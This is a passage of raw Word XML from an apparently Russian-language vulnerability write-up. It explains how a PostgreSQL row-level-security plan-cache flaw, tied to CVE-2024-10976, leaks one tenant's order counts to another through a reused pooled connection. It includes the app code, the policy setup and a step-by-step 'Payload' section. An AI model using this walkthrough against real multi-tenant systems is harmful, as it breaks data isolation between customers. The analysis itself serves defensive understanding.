          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B588C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            yield session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4D5998" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72D624" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            await session.execute(text("RESET ROLE"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668DE636" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            # ↑ Connection возвращается в pool с RESET ROLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC59C3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            # ↑ Plan-cache на connection сохраняется!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74074B83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E8D6E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/orders/dashboard")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D892E90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_dashboard(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC3190" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_role: str = Depends(get_tenant_role_from_jwt),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9646B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622C4EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with tenant_session(tenant_role) as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE97CA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Этот SQL содержит subquery на RLS-таблицу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E601A97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await session.execute(text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8D95E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE79BB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                (SELECT count(*) FROM app.orders WHERE status = 'pending') AS pending_count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D16D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                (SELECT count(*) FROM app.orders WHERE status = 'completed') AS completed_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127216C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        """))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE01CF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return dict(result.first()._mapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C41FAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Setup БД:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFF18F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE app.orders (id int, tenant_id int, status text, amount numeric);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2E041" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE app.orders ENABLE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1E745" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D20AC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF32291" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D820511" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Роли — по одной per tenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600948B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE tenant_42;  -- tenant_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F36C79A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE tenant_99;  -- tenant_id = 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53945136" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT ON app.orders TO tenant_42, tenant_99;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC5E87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection pool re-uses connection между запросами разных tenants. Subquery в SELECT-list — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rule expansion / RLS planning path</w:t>
      </w:r>
      <w:r>
        <w:t>, где CVE-2024-10976 hit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3600D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — cross-tenant data leak через plan-cache reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314881B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий (tenant 42) делает первый запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A4ABF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /orders/dashboard (с JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965C07A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection pool выдаёт connection C, делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET jwt.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PostgreSQL парсит SQL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строит plan с RLS-фильтром для tenant_42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE tenant_id = 42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Plan-cache сохраняет plan для этой query (с включёнными RLS-фильтрами для роли tenant_42). Response: counts по orders с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id = 42</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F95E66E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает connection в pool — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plan-cache на этом connection сохранён</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5E932" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой пользователь (tenant 99) делает запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFF7D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /orders/dashboard (с JWT tenant_99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9389F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Connection pool выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>тот же connection C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или другой — но pool обычно reuse). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET jwt.tenant_id = '99'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>берёт plan из cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для совпадающей query — этот plan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>содержит RLS-фильтр для tenant_42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (из Шага 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73206546" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*) FROM app.orders WHERE status = 'pending'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cached RLS expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE tenant_id = 42 AND status = 'pending'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE tenant_id = 99 AND status = 'pending'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Response: tenant_99 видит counts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tenant_42</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA3693" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auto_explain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для diagnosis):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C80E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOG:  execute &lt;unnamed&gt;: SELECT (SELECT count(*) FROM app.orders WHERE status = 'pending') AS pending_count, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F997C59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL:  Plan: ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E445426" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         Subquery scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D0C46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            -&gt;  Aggregate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ACA46F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                  -&gt;  Seq Scan on orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D0958" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
